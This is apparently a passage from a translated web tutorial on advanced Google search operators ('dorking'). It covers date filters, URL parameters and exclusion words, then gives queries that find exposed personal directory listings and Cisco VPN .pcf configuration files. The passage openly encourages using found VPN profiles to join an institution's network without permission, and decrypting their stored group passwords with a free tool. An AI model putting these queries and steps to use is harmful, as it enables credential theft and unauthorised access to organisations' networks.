    Confidential filetype: pdf daterange: 2457024-2457205

    The range is specified in Julian date format, excluding the fractional part. Translating them manually from the Gregorian calendar is inconvenient. It's easier to use a date converter.

    Targeting and filtering again

    In addition to specifying additional operators in the search query, you can send them directly in the body of the link. For example, the qualification filetype: pdf corresponds to the construction as_filetype = pdf. Thus, it is convenient to specify any clarifications. Let's say that the return of results only from the Republic of Honduras is specified by adding the cr = countryHN construction to the search URL, and only from the city of Bobruisk - gcs = Bobruisk. See the developer section for a complete list.

    Google's automation tools are meant to make life easier, but they often add challenges. For example, the user's city is determined by the user's IP via WHOIS. Based on this information, Google not only balances the load between servers, but also changes the search results. Depending on the region, for the same request, the first page will get different results, and some of them may be completely hidden. To feel like a cosmopolitan and to search for information from any country, its two-letter code after the gl = country directive will help. For example, the Netherlands code is NL, but the Vatican and North Korea do not have their own code on Google.

    Often, search results are cluttered even after using a few advanced filters. In this case, it is easy to refine the query by adding several exclusion words to it (each of them is preceded by a minus sign). For example, banking, names and tutorial are often used with the word Personal. Therefore, cleaner search results will be shown not by a textbook example of a query, but by a refined one:

    Intitle: "Index of / Personal /" -names -tutorial -banking

    Last example

    The sophisticated hacker is distinguished by the fact that he provides himself with everything he needs on his own. For example, a VPN is convenient, but either expensive or temporary and limited. It's too expensive to subscribe for yourself alone. It's good that there are group subscriptions, and with the help of Google it is easy to become part of a group. To do this, just find the Cisco VPN configuration file, which has a rather non-standard PCF extension and a recognizable path: Program Files \ Cisco Systems \ VPN Client \ Profiles. One request, and you join, for example, the friendly staff of the University of Bonn.

    Filetype: pcf vpn OR Group

    INFO

    Google finds configuration files with passwords, but many of them are encrypted or replaced with hashes. If you see strings of fixed length, then immediately look for a decryption service.

    Passwords are stored encrypted, but Maurice Massard has already written a program to decrypt them and provides it free of charge through thecampusgeeks.com.

    Hundreds of different types of attacks and penetration tests are performed using Google. There are many options, affecting popular programs, major database formats, multiple PHP vulnerabilities, clouds, and so on. If you have an accurate idea of ​​what you are looking for, it will greatly simplify obtaining the necessary information (especially the one that was not planned to be made public). Shodan is not a single source of interesting ideas, but every database of indexed network resources!





    

    2021 gtavrl.ru.